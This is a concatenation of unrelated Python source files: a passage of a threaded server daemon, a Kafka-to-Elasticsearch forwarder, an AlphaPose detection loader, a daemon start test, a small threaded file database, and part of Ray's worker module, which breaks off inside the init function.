LOG_WORKER_COUNT = int(CONFIG.log_worker_count or 3)
self.stopping = threading.Event()
self.backend = self.transport_class(self.config)
self.backend.set_context_from_config()
self.backend.prepare()
self.admin = Admin(self.config, self.backend)
self.admin.set_context_from_config()
self.admin.start()
self.manager = SessionManager(self.config, self.backend)
self.manager.set_context_from_config()
self.threads = []
for i in range(WORKER_COUNT):
thread = threading.Thread(target=self.worker, args=[])
thread.start()
self.threads.append(thread)
self.logger_threads = []
if self.logger:
for i in range(LOG_WORKER_COUNT):
thread = threading.Thread(target=self.logger_worker, args=[])
thread.start()
self.logger_threads.append(thread)
signal.signal(signal.SIGINT, self._handle_terminate)
signal.signal(signal.SIGTERM, self._handle_terminate)
self.backend.loop()
LOG.info('Exited main thread')
def _handle_terminate(self, *args):
LOG.info("Received terminate signal")
self.backend.terminate()
self.manager.stop()
self.stopping.set()
for thread in self.threads:
thread.join()
for logger_thread in self.logger_threads:
logger_thread.join()
LOG.info('Threads exited')
# Destroy managed plugins
for plugin_base in PLUGIN_BASES:
for plugin in plugin_base.__subclasses__():
if issubclass(plugin, ManagedPlugin):
try:
plugin.stop()
except:
pass
LOG.info('Stopped Server daemon')
def main():
Dispatcher().choose()
if __name__ == '__main__':
main()
|
kafka_to_elastic.py
|
import time
import threading
from elasticsearch import Elasticsearch
from kafka import KafkaConsumer
import sys
args = sys.argv
threads=[]
pull_data=[]
def pulldt(pull_num,es):
global pull_data
while True:
try:
value=pull_data[int(pull_num)][0]
pull_data[int(pull_num)].pop(0)
value=value.rsplit(",")
doc = {'received':str(value[1]),'sendtime':str(value[2]),'monitor':"alive",'minimum':str(value[3]),'jitter':str(value[4]),'serial':str(value[5]),'vxlanid':str(value[6])}
tmp = es.index(index=value[0], doc_type='type1', body=doc)
except:
continue
def main():
global threads
global pull_data
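    # Fan-out: 100 per-thread lists are created below and filled round-robin with Kafka messages;
    # each pulldt thread drains its own list into Elasticsearch.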
start_time=int(time.time())*1000
consumer = KafkaConsumer(bootstrap_servers="<elastic_ip>:9092",auto_offset_reset="earliest",group_id="main",enable_auto_commit=True)
consumer.subscribe(['oam-cc-data'+str(args[1])])
for i in range(100):
pull_data.append([])
es = Elasticsearch(['<elastic_ip>'],http_auth=('elastic', 'changeme'),port=9200,timeout=999999999)
thread_data=threading.Thread(target=pulldt,args=(str(i),es),name="a"+str(i))
thread_data.start()
num = 0
while True:
for message in consumer:
if message.timestamp >= start_time:
pull_data[int(num)].append(message.value)
num=num+1
if num == 100:
num = 0
if __name__ == '__main__':
main()
|
file_detector.py
|
from itertools import count
from os import read
from threading import Thread
from queue import Queue
import json
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.read_img import read_img
from alphapose.utils.presets import SimpleTransform
class FileDetectionLoader():
def __init__(self, input_source, cfg, opt, queueSize=128):
self.cfg = cfg
self.opt = opt
self.bbox_file = input_source
self._input_size = cfg.DATA_PRESET.IMAGE_SIZE
self._output_size = cfg.DATA_PRESET.HEATMAP_SIZE
self._sigma = cfg.DATA_PRESET.SIGMA
if cfg.DATA_PRESET.TYPE == 'simple':
self.transformation = SimpleTransform(
self, scale_factor=0,
input_size=self._input_size,
output_size=self._output_size,
rot=0, sigma=self._sigma,
train=False, add_dpg=False)
# initialize the det file list
boxes = None
if isinstance(self.bbox_file,list):
boxes = self.bbox_file
else:
with open(self.bbox_file, 'r') as f:
boxes = json.load(f)
assert boxes is not None, 'Load %s fail!' % self.bbox_file
self.all_imgs = []
self.all_boxes = {}
self.all_scores = {}
self.all_ids = {}
num_boxes = 0
for k_img in range(0, len(boxes)):
det_res = boxes[k_img]
img_name = det_res['image_id']
if img_name not in self.all_imgs:
self.all_imgs.append(img_name)
self.all_boxes[img_name] = []
self.all_scores[img_name] = []
self.all_ids[img_name] = []
x1, y1, w, h = det_res['bbox']
bbox = [x1, y1, x1 + w, y1 + h]
score = det_res['score']
self.all_boxes[img_name].append(bbox)
self.all_scores[img_name].append(score)
if 'idx' in det_res.keys():
self.all_ids[img_name].append(int(det_res['idx']))
else:
self.all_ids[img_name].append(0)
# initialize the queue used to store data
"""
pose_queue: the buffer storing post-processed cropped human image for pose estimation
"""
if opt.sp:
self._stopped = False
self.pose_queue = Queue(maxsize=queueSize)
else:
self._stopped = mp.Value('b', False)
self.pose_queue = mp.Queue(maxsize=queueSize)
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to pre process images for object detection
image_preprocess_worker = self.start_worker(self.get_detection)
return [image_preprocess_worker]
def stop(self):
# clear queues
self.clear_queues()
def terminate(self):
if self.opt.sp:
self._stopped = True
else:
self._stopped.value = True
self.stop()
def clear_queues(self):
self.clear(self.pose_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def wait_and_put(self, queue, item):
if not self.stopped:
queue.put(item)
def wait_and_get(self, queue):
if not self.stopped:
return queue.get()
def get_detection(self):
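        # For every image: load it, crop each detected box with the test transform, and push the
        # batch onto pose_queue; a final all-None tuple marks the end of the stream.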
for im_name_k in self.all_imgs:
boxes = torch.from_numpy(np.array(self.all_boxes[im_name_k]))
scores = torch.from_numpy(np.array(self.all_scores[im_name_k]))
ids = torch.from_numpy(np.array(self.all_ids[im_name_k]))
orig_img_k = read_img(im_name_k)
inps = torch.zeros(boxes.size(0), 3, *self._input_size)
cropped_boxes = torch.zeros(boxes.size(0), 4)
for i, box in enumerate(boxes):
inps[i], cropped_box = self.transformation.test_transform(orig_img_k, box)
cropped_boxes[i] = torch.FloatTensor(cropped_box)
self.wait_and_put(self.pose_queue, (inps, orig_img_k, im_name_k, boxes, scores, ids, cropped_boxes))
self.wait_and_put(self.pose_queue, (None, None, None, None, None, None, None))
return
def read(self):
return self.wait_and_get(self.pose_queue)
@property
def stopped(self):
if self.opt.sp:
return self._stopped
else:
return self._stopped.value
@property
def length(self):
return len(self.all_imgs)
@property
def joint_pairs(self):
"""Joint pairs which defines the pairs of joint to be swapped
when the image is flipped horizontally."""
return [[1, 2], [3, 4], [5, 6], [7, 8],
[9, 10], [11, 12], [13, 14], [15, 16]]
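# A rough usage sketch for FileDetectionLoader. The detection-file path and
# the shape of `cfg`/`opt` below are assumptions for illustration: `cfg` is an
# AlphaPose config with a DATA_PRESET section and `opt` carries the `sp` flag
# checked in __init__.
#
#   loader = FileDetectionLoader('detections.json', cfg, opt)
#   loader.start()
#   for _ in range(loader.length):
#       (inps, orig_img, im_name,
#        boxes, scores, ids, cropped_boxes) = loader.read()
#       ...  # run pose estimation on `inps`
#   loader.stop()
#
# Each entry of the detection JSON is expected to look like:
#   {"image_id": "0001.jpg", "bbox": [x, y, w, h], "score": 0.98, "idx": 1}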
|
test_start.py
|
import sys
import os
import time
import subprocess
sys.path.append(os.path.normpath("../../main/python/"))
from daemon_launcher import daemon_launcher
from multiprocessing import Process
print(os.path.abspath(os.curdir))
subprocess.call("./initrepo.sh")
# Make sure the daemon isn't running when we start
if daemon_launcher.daemon_is_running():
daemon_launcher.stop_daemon()
# Start the daemon and wait for this action to finish
p = Process(target=daemon_launcher.start_daemon)
p.start()
p.join()
time.sleep(1)
# check that the daemon is running.
assert(daemon_launcher.daemon_is_running())
# check that the log files exist.
assert(os.path.isfile('/tmp/gitup/daemon.out'))
assert(os.path.isfile('/tmp/gitup/daemon.err'))
# stop the daemon
daemon_launcher.stop_daemon()
print('passed')
sys.exit(0)
|
Database.py
|
import utils
import threading
from time import sleep
UPDATE_FIFO = 0.05
UPDATE_BUFFER = 0.2
AUTO_SAVE = 20
class Database:
    def __init__(self, database_file, check_dup=True):
        self.buffer = []
        self.buffered_fifo = []
        self.fifo = []
        self.database_file = database_file
        self.check_dup = check_dup
        self._get_data_from_file()
        self.lock = threading.Lock()
        # Daemon threads so the interpreter can exit even though the
        # background loops below run forever.
        self.fifo_updater = threading.Thread(target=self._get_fifo, daemon=True)
        self.buffer_updater = threading.Thread(target=self._update_buffer, daemon=True)
        self.auto_saver = threading.Thread(target=self._flush_data, daemon=True)
        self.fifo_updater.start()
        self.buffer_updater.start()
        self.auto_saver.start()
def get_index(self, index):
return self.buffer[index]
    def append_data(self, data):
        # Stage new items; _get_fifo moves them into the buffered queue.
        with self.lock:
            self.fifo.extend(data)
def get_length(self):
return len(self.buffer)
def clear(self):
self.buffer = []
self.fifo = []
self.buffered_fifo = []
with open(self.database_file,"w") as db_file:
db_file.write("")
    def _get_fifo(self):
        while True:
            with self.lock:
                self.buffered_fifo.extend(self.fifo)
                self.fifo = []
            sleep(UPDATE_FIFO)
    def _update_buffer(self):
        while True:
            with self.lock:
                for item in self.buffered_fifo:
                    # Only keep items not already in the buffer when
                    # duplicate checking is enabled.
                    if not self.check_dup or item not in self.buffer:
                        self.buffer.append(item)
                self.buffered_fifo = []
            sleep(UPDATE_BUFFER)
def _get_data_from_file(self):
self.buffer = []
with open(self.database_file,encoding="utf-8") as db_file:
for line in db_file:
self.buffer.append(line[:-1])
    def _flush_data(self):
        while True:
            if self.buffer:
                print("AUTOSAVE")
                with self.lock:
                    with open(self.database_file, "w", encoding="utf-8") as db_file:
                        db_file.write(utils.list_to_str(self.buffer))
            sleep(AUTO_SAVE)
if __name__ == '__main__':
db = Database("test.db")
db.clear()
db.append_data(["1","2","3"])
sleep(1)
print(db.get_index(2))
print(db.get_length())
|
worker.py
|
from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.gcs_utils as gcs_utils
import ray._private.services as services
from ray._private.runtime_env import working_dir as working_dir_pkg
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
from ray.util.debug import log_once
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
import ray._private.profiling as profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
# increment every time when `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
# If True, make the debugger external to the node this worker is
# running on.
self.ray_debugger_external = False
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def worker_id(self):
return self.core_worker.get_worker_id().binary()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return json.loads(self.core_worker.get_job_config()
.runtime_env.serialized_runtime_env)
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
        # called by `register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
owner_address: The serialized address of object's owner.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value,
object_ref=object_ref,
owner_address=owner_address))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
            timeout (float): The maximum amount of time in seconds to wait
                before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function,
run_on_other_drivers=False):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
            run_on_other_drivers: Whether this function should also be run
                on other drivers. One use case is sharing objects across
                drivers.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_function(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hset(
key,
mapping={
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
"run_on_other_drivers": str(run_on_other_drivers),
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
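    # Example (sketch): a driver can use run_function_on_all_workers to, for
    # instance, extend sys.path on every worker, mirroring what connect()
    # does below for the script directory. The path here is illustrative.
    #
    #   def _add_path(worker_info):
    #       import sys
    #       sys.path.insert(1, "/tmp/my_shared_code")
    #
    #   ray.worker.global_worker.run_function_on_all_workers(_add_path)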
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
pubsub_client = self.redis_client.pubsub(
ignore_subscribe_messages=True)
pubsub_client.subscribe(gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_binary = ray._private.utils.binary_to_hex(
self.current_job_id.binary())
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = pubsub_client.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_binary != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
pubsub_client.close()
@PublicAPI
@client_mode_hook(auto_init=True)
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
if worker.mode != WORKER_MODE:
if log_once("worker_get_gpu_ids_empty_from_driver"):
logger.warning(
"`ray.get_gpu_ids()` will always return the empty list when "
"called from the driver. This is because Ray does not manage "
"GPU allocations to the driver process.")
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
# Note: We should only get the GPU ids from the placement
# group resource that does not contain the bundle index!
import re
if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
resource):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
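# Example (sketch): inside a GPU task, ray.get_gpu_ids() reports the IDs
# assigned to that worker; the return values shown are illustrative.
#
#   @ray.remote(num_gpus=1)
#   def which_gpu():
#       return ray.get_gpu_ids()  # e.g. [0], or a remapped ID when
#                                 # CUDA_VISIBLE_DEVICES was set
#
#   ray.get(which_gpu.remote())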
@Deprecated
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook(auto_init=False)
def init(
address: Optional[str] = None,
*,
num_cpus: Optional[int] = None,
num_gpus: Optional[int] = None,
resources: Optional[Dict[str, float]] = None,
object_store_memory: Optional[int] = None,
local_mode: bool = False,
ignore_reinit_error: bool = False,
include_dashboard: Optional[bool] = None,
dashboard_host: str = ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port: Optional[int] = None,
job_config: "ray.job_config.JobConfig" = None,
configure_logging: bool = True,
logging_level: int = logging.INFO,
logging_format: str = ray_constants.LOGGER_FORMAT,
log_to_driver: bool = True,
namespace: Optional[str] = None,
runtime_env: Dict[str, Any] = None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction: bool = False,
_redis_max_memory: Optional[int] = None,
_plasma_directory: Optional[str] = None,
_node_ip_address: str = ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory: Optional[int] = None,
_memory: Optional[int] = None,
_redis_password: str = ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir: Optional[str] = None,
_lru_evict: bool = False,
_metrics_export_port: Optional[int] = None,
_system_config: Optional[Dict[str, str]] = None,
_tracing_startup_hook: Optional[Callable] = None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows (substituting
in the appropriate port if needed).
.. code-block:: python
ray.init(address="localhost:6379")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities for them available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
        dashboard_port (int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
namespace (str): Namespace to use
runtime_env (dict): The runtime environment to use for this job (see
:ref:`runtime-environments` for details). This API is in beta
and may change before becoming stable.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
        _metrics_export_port (int): Port number Ray exposes system metrics
through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
